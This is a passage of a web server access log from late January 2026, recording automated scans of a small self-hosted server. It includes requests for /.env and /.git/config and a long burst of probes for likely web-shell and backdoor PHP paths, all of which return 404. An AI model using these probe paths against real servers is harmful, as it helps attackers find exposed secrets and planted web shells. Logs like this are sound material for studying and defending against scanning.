+[27/Jan/2026:23:47:31 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 146.190.164.150] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[27/Jan/2026:23:47:32 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 146.190.164.150] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[27/Jan/2026:23:51:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:23:52:06 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[28/Jan/2026:00:01:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:05:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:14:43 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:18:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/zwso.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/blue/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/class19.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/class20.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/randkeyword.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/fwe.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/images/m.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/g.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/tx1.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/xv.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/x56.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/htaccess.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/readme.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/x50.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/fv.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php?" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/lsd.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/as.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/wsd.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/gtc.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/atx.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/z60.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/403.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/m.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/themes.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/network/wp-conflg.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/click.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/install.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/lv.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/simple.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/css.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/cong.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/images/wp-login.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/cong.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/w.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/404.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/0x.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/css.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/maint.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/classwithtostring.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/autoload_classmap.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/inputs.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/alfa.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/themes/twentytwentytwo/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/js/wp-conflg.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/wp-conflg.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/wp-conflg.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/manager.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/item.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/plugins/Cache/footer.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/404.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/mail.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/sx.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/admin.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/alfa.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/1.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/byp.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-trackback.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/network/plugins.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/gmo.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/ID3/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/css/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/SimplePie/wp-login.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/filemanager/dialog.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/customize/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/index/function.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/uploads/autoload_classmap.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/style-engine/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/ww1.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/about/function.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:18:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin/function.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/acme-challenge/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/css/colors/blue/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/security.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/user/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/js/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/upgrade/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/assets/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/radio.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/fonts/index.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/admin.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/admin.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/admin.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/twentytwentytwo/index.php?p=" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/log.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/class.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless5.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/js/codemirror/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/block-patterns/index.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/lock360.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o1.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/juuuu.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/ha.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/gg.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/we2.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/04.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/333.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/520.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/ar.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/x.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/xx.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass4.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/2clas.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/ave.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/wrt.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/bibil.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/radio.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/files.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/file7.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/midnight/about.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/nox.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/file48.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/info.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/class9.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/la.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless11.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/ccou.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/ton.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/403.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/file9.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/ac.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/new4.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/pop.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/az.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/xaz.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/up4.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/1aa.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/elp.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wtz.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/galex.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/xb.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/ova.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/vx.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:19:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/rh.php" [Client 20.27.221.169] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:00:29:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:00:31:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:32:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:47:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 205.210.31.209] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[28/Jan/2026:00:51:12 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:54:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:54:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:56:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:00:59:36 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 199.45.155.99] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:00:59:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.99] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:00:59:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.99] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:00:59:40 +0000] 400 - GET http profibot.direct.quickconnect.to "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:01:04:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:01:05:49 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:01:17:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:01:21:31 